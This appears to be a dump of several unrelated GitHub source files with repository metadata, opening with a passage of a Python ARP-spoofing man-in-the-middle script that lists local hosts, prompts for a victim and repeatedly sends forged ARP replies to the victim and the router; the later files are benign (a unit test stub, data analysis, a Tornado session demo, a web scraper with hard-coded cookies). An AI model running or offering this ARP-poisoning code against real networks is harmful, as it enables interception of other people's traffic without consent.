return ([(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close())
for s in [socket.socket(socket.AF_INET,socket.SOCK_DGRAM)]][0][1])
except socket.error as e:
sys.stderr.write(str(e) + "\n")
sys.exit(e.errno)
def get_local_network_addr():
"""
Get local network IP and MAC address.
"""
proc = subprocess32.Popen(["arp", "-a"], stdout=subprocess32.PIPE)
output = proc.stdout.read().split()
out_ip = output[1]
out_mac = output[3]
return_dict = {"ip": out_ip, "mac": out_mac}
return return_dict
def set_ip_forwarding(toggle):
if toggle:
print("Turing on IP forwarding:")
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
if not toggle:
print("Turing off IP forwarding:")
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
def reassign_arp(victim_ip, victim_mac, router_ip, router_mac, interface):
"""
Function notifies the AP and the host to start connecting to each other again.
:param victim_ip:
:param victim_mac:
:param router_ip:
:param router_mac:
:param interface:
:return:
"""
print("Reassigning ARP tables:")
# send ARP request to router as-if from victim to connect,
# do it 7 times to be sure
all.send(all.ARP(op=2, pdst=router_ip, psrc=victim_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victim_mac), count=7)
# send ARP request to victim as-if from router to connect
# do it 7 times to be sure
all.send(all.ARP(op=2, pdst=victim_ip, psrc=router_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=router_mac), count=7)
set_ip_forwarding(False)
def attack(victim_ip, victim_mac, router_ip, router_mac):
"""
Performs the MitM attack on the victim.
:param victim_ip:
:param victim_mac:
:param router_ip:
:param router_mac:
:return:
"""
all.send(all.ARP(op=2, pdst=victim_ip, psrc=router_ip, hwdst=victim_mac))
all.send(all.ARP(op=2, pdst=router_ip, psrc=victim_ip, hwdst=router_mac))
if __name__ == '__main__':
subprocess32.call("airmon-ng")
interface = raw_input("Enter wireless interface to use: ")
set_ip_forwarding(True)
hosts = scan()
num = 1
all_hosts = {}
for host in hosts:
if host.has_key("ip") and host.has_key("mac"):
all_hosts[str(num)] = host
print str(num) + " IP: " + host["ip"] + " MAC: " + host["mac"]
num += 1
host_id = raw_input("Enter the host ID to attack: ")
victim_ip = all_hosts[host_id]["ip"]
victim_mac = all_hosts[host_id]["mac"]
addr = get_local_network_addr()
router_ip = addr["ip"].replace("(", "").replace(")", "")
router_mac = addr["mac"].upper()
print "Router - IP: " + router_ip + " MAC: " + router_mac
print "Victim - IP: " + victim_ip + " MAC: " + victim_mac
while True:
try:
attack(victim_ip, victim_mac, router_ip, router_mac)
time.sleep(1.5)
except KeyboardInterrupt:
reassign_arp(victim_ip, victim_mac, router_ip, router_mac, interface)
break
sys.exit(1)
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
26bc1342180ebbe498f0c43171c93b41246741b6 | 8f4c691f190a1d4ffd4261ea6dca6a2d3a96284c | /csa/csa/doctype/coach/test_coach.py | 0237f9215f3d3c946814d85ca059dd549fb3f4eb | [
"MIT"
] | permissive | Jishnu70055/usermanagement | 57abb738160fb213acdc2c71b40244eae4b06cee | f7b526335c2b99899afac188696071fa35df09ca | refs/heads/master | 2023-09-03T17:30:50.147750 | 2021-10-21T13:27:38 | 2021-10-21T13:27:38 | 399,362,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 135 | py | # Copyright (c) 2021, s and Contributors
# See license.txt
# import frappe
import unittest
class TestCoach(unittest.TestCase):
pass
| [
"jishnudq70055@gmail.com"
] | jishnudq70055@gmail.com |
4e7fae46c7716e5f2f01b9716619049be364d6d0 | 651cec6cbee315bd12c93364c0a721aeed0e02d2 | /pnldash/extra.py | f46daae861d5bffa21997cad87fcf599607cf9af | [] | no_license | pnlbwh/pnldash | 44e3f20b5515ebf0dacf110bf3ac1b8ebebc383f | 454aea60794ea5dfe1be820a6f23328c0345ace9 | refs/heads/master | 2020-03-22T18:23:50.658315 | 2017-08-31T15:34:34 | 2017-08-31T15:34:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,677 | py | from __future__ import print_function
from plumbum import cli, local
import sys
import pandas as pd
import csv
import os
from .util import getsize
from .config import *
from .find import make_find
from .csvs import make_csvs
import logging
log = logging.getLogger(__name__)
def _heading(s):
return s + '\n' + len(s) * '-'
def _relativePath(p):
return local.path(p).relative_to(local.cwd)
def _compute_extra_table():
paths_tbl = pd.read_csv(PATHS_CSV.__str__())
if not paths_tbl.empty:
# raise Exception("'{}' is empty. Make sure".format(PATHS_CSV))
pipeline_paths = paths_tbl[paths_tbl.exists]['path']
else:
pipeline_paths = []
with open(FIND_TXT, 'r') as f:
found_paths = f.read().splitlines()
extraFiles = list(set(found_paths) - set(pipeline_paths))
sizes = [getsize(f) for f in extraFiles]
df = pd.DataFrame({'projectPath': local.cwd,
'path': extraFiles,
'sizeMB': sizes })
return df
def make_extra():
make_csvs()
make_find()
if EXTRA_CSV.exists():
find_modtime = os.path.getmtime(str(FIND_TXT))
paths_modtime = os.path.getmtime(str(PATHS_CSV))
extra_modtime = os.path.getmtime(str(EXTRA_CSV))
if extra_modtime > find_modtime and extra_modtime > paths_modtime:
log.info("Using cached file '{}' for unaccounted files.".format(EXTRA_CSV))
return pd.read_csv(EXTRA_CSV.__str__())
log.info("Compute unaccounted files, might take a minute the first time if your project directory is large")
df = _compute_extra_table()
df.to_csv(str(EXTRA_CSV), index=False)
return df
| [
"reckbo@bwh.harvard.edu"
] | reckbo@bwh.harvard.edu |
979f192450c56835036ea1573a2650dab6f9db10 | 7cd3dafa74f596e5e68cc0c2334bf4035e8d3256 | /ex32.py | 4f56420339fb5b8b1bf24d7b0be07c8ca1a90f9a | [] | no_license | afitzmaurice/learnpython | e300d5a1524d9cab9a959b0f36f54ee6282e9db2 | 88ec6b612ad3f7cd63844d21e1288e3e987a7328 | refs/heads/master | 2016-08-12T07:38:57.028688 | 2015-12-05T22:37:38 | 2015-12-05T22:37:38 | 46,667,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 978 | py | the_count = [1, 2, 3, 4, 5]
fruits = ['apples', 'oranges', 'pears', 'apricots']
change = [1, 'pennies', 2, 'dimes', 3, 'quarters']
#this first kind of for loop goes through a list
#note that number is defined by the for loop when it starts
for number in the_count:
print "This is count %d" % number
#same as above
for fruit in fruits:
print "A fruit of type: %s" % fruit
#note that we have to use %r since we don't know what's in it
for i in change:
print "I got %r" % i
#we can also build lists, first start with an empty one
elements = []
#then use the range function to do 0 to 5 counts
#note that the range does not include the last number, in this case, '6'
for i in range(0, 6):
print "Adding %d to the list" % i
#append is a function that lists understand
elements.append(i)
#the above for loop can be replaced with "elements = range(6)"
#now we can use the for loop to print them as well
for i in elements:
print "Element was: %d" % i
| [
"ashfitzmaurice@gmail.com"
] | ashfitzmaurice@gmail.com |
f262c1884c06159a8d3c99fba9887b52ddab876d | 38da8d3b3dbeabc2e0cba77c8e8b18d2557460d9 | /Análisis exploratorio/analisis_exploratorio_imagenes.py | afd35813a828b71b065dada31f7d6d27386e2223 | [] | no_license | san13660/data-science-proyecto-2 | 8bab71516a4f097132894f688650123e44b7af5c | df6d396d2fdf8ee8fdfd43bcfe70fc6c80c344a4 | refs/heads/master | 2023-01-13T23:34:57.803243 | 2020-11-19T22:11:59 | 2020-11-19T22:11:59 | 293,656,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,121 | py | from PIL import Image
import os.path
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from os import walk
### Se hace una lectura de las imagenes
heightArray = []
widthArray = []
cantidadPixeles = []
pathImagenPequena = ''
pathImagenGrande = ''
for (dirpath, dirnames, filenames) in walk('boneage-training-dataset'):
for filename in filenames:
### Se extrae las dimensiones de las imagenes
with Image.open('boneage-training-dataset/' + filename) as image:
width, height = image.size
heightArray.append(height)
widthArray.append(width)
cantidadPixeles.append(height * width)
if max(cantidadPixeles) == height * width:
pathImagenGrande = 'boneage-training-dataset/' + filename
if min(cantidadPixeles) == height * width:
pathImagenPequena = 'boneage-training-dataset/' + filename
### Se revisa la distribucion que hay en las alturas de las imagenes
plt.hist(heightArray, bins=10, color='blue')
plt.show()
### Se revisa la distribucion que hay en los anchos de las imagenes
plt.hist(widthArray, bins=10, color='orange')
plt.show()
### Se revisa la distribucion que hay en la cantidad de pixeles en las imagenes
plt.hist(cantidadPixeles, bins=10, color='red')
plt.show()
### Se hace una revision de cuales son las dimension mas pequeñas y mas grandes
print("La altura mas grande es: ", str(max(heightArray)))
print("La altura mas pequeña es: ", str(min(heightArray)))
print("La anchura mas grande es: ", str(max(widthArray)))
print("La anchura mas pequeña es: ", str(min(widthArray)))
print("La cantidad de pixeles mas grande en un imagen es: ", str(max(cantidadPixeles)))
print("La cantidad de pixeles mas pequeña en un imagen es: ", str(min(cantidadPixeles)))
### Se hace una comparacion de la imagen mas pequeña y la mas grande para darnos una idea
### de que tanto afectaria redimensionar el tamaño de la imagen
img = mpimg.imread(pathImagenPequena)
imgplot = plt.imshow(img)
plt.show()
img = mpimg.imread(pathImagenGrande)
imgplot = plt.imshow(img)
plt.show()
| [
"urielsonic@gmail.com"
] | urielsonic@gmail.com |
43d0b188562d1f33cfa7372f8ffe2841e9ddbcd3 | 39072c596e35ed011ee9a9a2e21598b5939aaa3e | /circle.py | cbdbe7bdd53b5ef80bdbe540215d9e1bd8b2a70a | [] | no_license | Jessica-Thomas/PythonPractice | da72922fb8834d903827e19af1f75afba76f2434 | a449c07f8fefac95cc2d4a89d90af304ce3357b9 | refs/heads/main | 2023-03-16T10:52:49.013659 | 2021-03-03T23:24:26 | 2021-03-03T23:24:26 | 330,848,898 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 358 | py | class Circle:
def __init__(self, diameter):
self.diameter = diameter
@property
def radius(self):
return self.diameter / 2
@radius.setter
def radius(self, radius):
self.diameter = radius * 2
small = Circle(10)
print(small.diameter)
print(small.radius)
small.radius = 10
print(small.diameter) | [
"jessica.thomas648@gmail.com"
] | jessica.thomas648@gmail.com |
08615aac82ac581b68edd26ecccabf3cfe930fcd | e3349214c805f86f9958ab99bed4e7c54056a700 | /yundijie/ydj_transfer.py | 2641d60418cf2ccb87cb49a260cd07fe34f88d54 | [] | no_license | wwdd23/spider_script | 05461b0306aae2120c3dcf9afbf5578a56268f99 | 4a925f94bacff143e4c04b5e3296d2b2ec5e4651 | refs/heads/master | 2021-01-10T23:38:04.990672 | 2016-10-18T03:37:53 | 2016-10-18T03:37:53 | 70,413,785 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,732 | py | #!/usr/bin/env python
#-*- coding: utf-8 -*-
import httplib
import json
import StringIO
import gzip
import pymongo
import get_ua
import datetime
conn = httplib.HTTPConnection("yundijie.com")
def trans(params):
ua = get_ua.get_random_ua()
headers = {
'Content-Type':'application/json; charset=UTF-8',
'Authorization':'Basic 6auY5Lya5aifOjEyMzQ1Ng==',
'Accept':'application/json, text/javascript, */*; q=0.01',
'Accept-Encoding':'gzip, deflate',
'Accept-Language':'zh-CN,zh;q=0.8',
#'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.14) Gecko/20080404 (FoxPlus) Firefox/2.0.0.14',
'User-Agent': ua,
#'Cookie': cookies,
'Cookie': 'JSESSIONID=FA421051C0F377D492AC21AFE2794041; cla_sso_token=9ca653147a0945fc9f62; login_name=BDtest17; Hm_lvt_c01e035e5dc6df389fa1746afc9cf708=1476429644; Hm_lpvt_c01e035e5dc6df389fa1746afc9cf708=1476684919',
#'Cookie':'JSESSIONID=AC5AE2594627900BCC1B188BD5E30419; Hm_lvt_c01e035e5dc6df389fa1746afc9cf708=1475908244,1475983325,1475994954; Hm_lpvt_c01e035e5dc6df389fa1746afc9cf708=1476331358; cla_sso_token=41ac3ae3d4e64b09b923; login_name=BDtest17'
}
#params = ({"airportCode":"CDG","startLocation":"49.009670,2.547860","endLocation":"48.873642,2.3062469","serviceDate":"2016-11-11 08:00:00","startDate":"2016-11-12","startTime":"08:00","flightInfo":{"is_custom":1},"airportInfo":{"airportCode":"CDG","airportHotWeight":0,"airportId":449,"airportLocation":"49.009670,2.547860","airportName":"戴高乐国际机场","bannerSwitch":1,"isHotAirport":0,"landingVisaSwitch":0,"cityId":138,"location":"49.009670,2.547860"},"pickupAddress":{"placeAddress":"35 Rue de Berri, 75008 Paris, 法国","placeIcon":"https://maps.gstatic.com/mapfiles/place_api/icons/lodging-71.png","placeId":"ChIJEzb-M8Fv5kcR9yv80he-4sA","placeLat":48.873642,"placeLng":2.3062469,"placeName":"Hotel Champs Elysées Plaza*****","score":0.9033104181289673,"source":"google"}})
params = params
conn.request("POST", "/price/query_transfer_quotes", json.JSONEncoder().encode(params), headers)
response = conn.getresponse()
data = response.read()
if response.status == 200:
print 'success'
print data
data = StringIO.StringIO(data)
print data.len
try:
gz = gzip.GzipFile(fileobj=data)
print gz
data = gz.read()
gz.close()
except:
print "none gz pass"
gz.close()
return
client = pymongo.MongoClient('localhost', 27017)
spider = client['test_spider']
spiderdata = spider['spiderdata']
datas = json.loads(data)
print datas.keys()
print datas['status']
#for data in datas['data']:
params_info = json.dumps(params, ensure_ascii=False, indent=4)
params_data = json.loads(params_info)
airport = params_data['airportInfo']['airportName']
address = params_data['transferAddress']['placeName']
startDate = params_data['startDate']
serviceDate = params_data['serviceDate']
print airport
print address
print startDate
print serviceDate
spiderdata.insert_one({
"created_at": (datetime.date.today()).isoformat(),
"startDate": startDate,
"serviceDate": serviceDate,
"airportName": airport,
"address": address,
"type": "transfer",
"result": datas['data']
})
print(data)
else:
print 'fail'
conn.close()
| [
"wudi@haihuilai.com"
] | wudi@haihuilai.com |
ac3b79bcd97dc02636e24488dfa93048a5395d63 | 53214f87d5de4d50ff42b218b6a169edde357315 | /airplane_calculations.py | d20a6f69e7ec84255064a696f1d640aa056e3908 | [] | no_license | brian-cuny/620project1 | 5f34a092cb9fc3cb6870ffada9b3b48d230fa631 | 3ef18966214ccac51e05c13b5545f7b3f6003bb1 | refs/heads/master | 2020-03-19T16:52:52.320302 | 2018-06-25T22:36:29 | 2018-06-25T22:36:29 | 136,734,504 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,269 | py | import csv
import networkx as nx
import matplotlib.pyplot as plt
if __name__ == '__main__':
with open('airports_sub.csv') as read_file:
airports = {int(r[0]): r for r in csv.reader(read_file, delimiter=',')}
with open('connections_sub.csv') as read_file:
connections = [(int(r[0]), int(r[1])) for r in csv.reader(read_file, delimiter=',')]
G = nx.Graph()
G.add_edges_from(connections)
degree_centrality = nx.degree(G)
# print(degree_centrality)
degree_closeness = nx.closeness_centrality(G)
# print(degree_closeness)
eigenvector_centrality = nx.eigenvector_centrality(G)
# print(eigenvector_centrality)
betweenness_centrality = nx.betweenness_centrality(G)
# print(betweenness_centrality)
for ap, deg in degree_centrality:
airports[ap].append(deg)
airports[ap].append(degree_closeness[ap])
airports[ap].append(eigenvector_centrality[ap])
airports[ap].append(betweenness_centrality[ap])
with open('calculations.csv', 'w') as write_file:
writer = csv.writer(write_file)
writer.writerow(('ID', 'Airport', 'Country', 'Centrality', 'Closeness', 'Eigenvector', 'Betweenness'))
for a in airports.values():
writer.writerow(a)
| [
"brian.weinfeld@gmail.com"
] | brian.weinfeld@gmail.com |
5a091ab107c4e5d163d242d119c57c1fbd321eb4 | 10ca8a1d04eb2d95b5153725366d1483a21ce085 | /src/svviz/__init__.py | 8eede553f204534eeb5465c2d5329bdb6e786fdb | [
"MIT"
] | permissive | apregier/svviz | b5c04620d47eee4b92e61c0549294c07ace06e2b | e3e0cbee3eda104199f70142d0fc9264d613f1f7 | refs/heads/master | 2021-01-17T18:32:56.835803 | 2015-10-29T21:49:24 | 2015-10-29T21:49:24 | 45,568,368 | 1 | 0 | null | 2015-11-04T21:24:32 | 2015-11-04T21:24:32 | null | UTF-8 | Python | false | false | 25 | py | __version__ = "1.3.3dev"
| [
"nspies@stanford.edu"
] | nspies@stanford.edu |
9268005884d19f86e946b466114a10b7ff5c1c9e | e5beafe9aac8a90eb360ca46628d547d5c50677c | /tests/conftest.py | 257cca49f9554a5b3a4a27553bed4858d0fcdf38 | [
"MIT"
] | permissive | flask-dashboard/Flask-MonitoringDashboard | 84c3a479d6eb2bc16201984d3988e52091b23208 | bd41a2396d0770ad14e5b739db42c69ecd85cd49 | refs/heads/master | 2023-09-01T03:09:12.583145 | 2023-08-22T21:16:55 | 2023-08-22T21:16:55 | 87,939,708 | 747 | 168 | MIT | 2023-08-22T21:07:23 | 2017-04-11T13:50:14 | Python | UTF-8 | Python | false | false | 167 | py | """Import all fixtures here."""
from tests.fixtures.dashboard import * # noqa
from tests.fixtures.database import * # noqa
from tests.fixtures.models import * # noqa
| [
"patrick.vogel@seetickets.nl"
] | patrick.vogel@seetickets.nl |
e3a92cfa48a1c688c0d840416cf412ca89c8dfe9 | a57b6c021fe307a03f2bcbc79cb1dac848e94ee3 | /session_test.py | f0ba7aba45bb6545e51ac3acc43c330b2d59011b | [] | no_license | wangjunji1/tornado_footprint | 432e73a422c1676a8488ccc9a53606b116146bf6 | 5ecbb98e036327e36f26f149f9b31f85e7fada7e | refs/heads/master | 2021-01-21T20:26:05.065425 | 2016-12-07T00:01:33 | 2016-12-07T00:01:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,506 | py | import tornado.ioloop
import tornado.web
import os,time
from hashlib import sha1
# Module-level store mapping session id -> per-user key/value dict, one
# entry per client. In-memory only: lost on restart and not shared
# between processes.
session_container = {}


def create_session_id():
    """Return a fresh, hard-to-guess session id (40-char SHA-1 hex digest).

    Mixes 6 random bytes with the current timestamp so ids stay unique
    even for requests created within the same clock tick.
    """
    return sha1(bytes('%s%s' % (os.urandom(6), time.time()), encoding='utf-8')).hexdigest()
class Session(object):
    """Dict-like per-client session backed by the module-level session_container.

    Each request handler builds a Session around itself; the session id
    lives in a client-side cookie and keys into session_container.
    """

    # Cookie field name that carries the session id on the client.
    cookie_name = '__sessionID__'

    def __init__(self, request):
        """Bind to *request* (a RequestHandler), reusing or minting a session id."""
        session_id = request.get_cookie(Session.cookie_name)
        if session_id:
            self._id = session_id
        else:
            self._id = create_session_id()
        # Re-set the cookie on every request, whether or not one existed,
        # so the client always carries the current id.
        request.set_cookie(Session.cookie_name, self._id)

    def __setitem__(self, key, value):
        # setdefault lazily creates this session's dict on first write.
        session_container.setdefault(self._id, {})[key] = value

    def __getitem__(self, key):
        # Fix: a brand-new session has no entry in session_container yet;
        # chained .get() returns None instead of raising KeyError when
        # either the session or the key is missing (e.g. visiting /index
        # before logging in).
        return session_container.get(self._id, {}).get(key)

    def __delitem__(self, key):
        # Deliberately keeps dict semantics: deleting a missing key raises.
        del session_container[self._id][key]
class BaseHandler(tornado.web.RequestHandler):
    """Common base for all handlers: attaches a per-request Session."""

    def initialize(self):
        """Tornado hook that runs before every HTTP verb method.

        Because it executes first, the ``my_session`` attribute created
        here is available in every subclass handler. The Session is given
        this handler instance so it can read and write the session cookie.
        """
        self.my_session = Session(self)
class MainHandler(BaseHandler):
    """Index page handler; echoes stored session values to stdout."""

    def get(self):
        """Print the logged-in user's session fields, then render the page body."""
        for field in ('user', 'pos'):
            print(self.my_session[field])
        self.write('index')
class LoginHandler(BaseHandler):
    """Login form handler: GET shows the form, POST checks credentials."""

    def get(self):
        """Render an empty login form (template expects a 'status' message)."""
        self.render('login.html', status='')

    def post(self):
        """Validate the submitted credentials against the hard-coded account."""
        username = self.get_argument('username')
        password = self.get_argument('password')
        if username != 'zs' or password != '111':
            # Wrong credentials: re-render the form with an error status.
            self.render('login.html', status='用户名或密码错误')
            return
        # Successful login: stash identity data in the server-side session,
        # then bounce to the index page.
        self.my_session['user'] = 'zs'
        self.my_session['pos'] = '113.32'
        self.redirect('/index')
# Application settings; Tornado's Application accepts these as keyword
# arguments, hence the ** expansion below. 'login_url' is where
# @tornado.web.authenticated would redirect unauthenticated users.
settings = {
    'template_path': 'template',
    'login_url': '/login'
}
application = tornado.web.Application([
    (r'/index',MainHandler),
    (r'/login',LoginHandler),
],**settings)  # settings must be passed as keyword arguments
if __name__ == '__main__':
    application.listen(8000)
    tornado.ioloop.IOLoop.instance().start()
"815666124@qq.com"
] | 815666124@qq.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.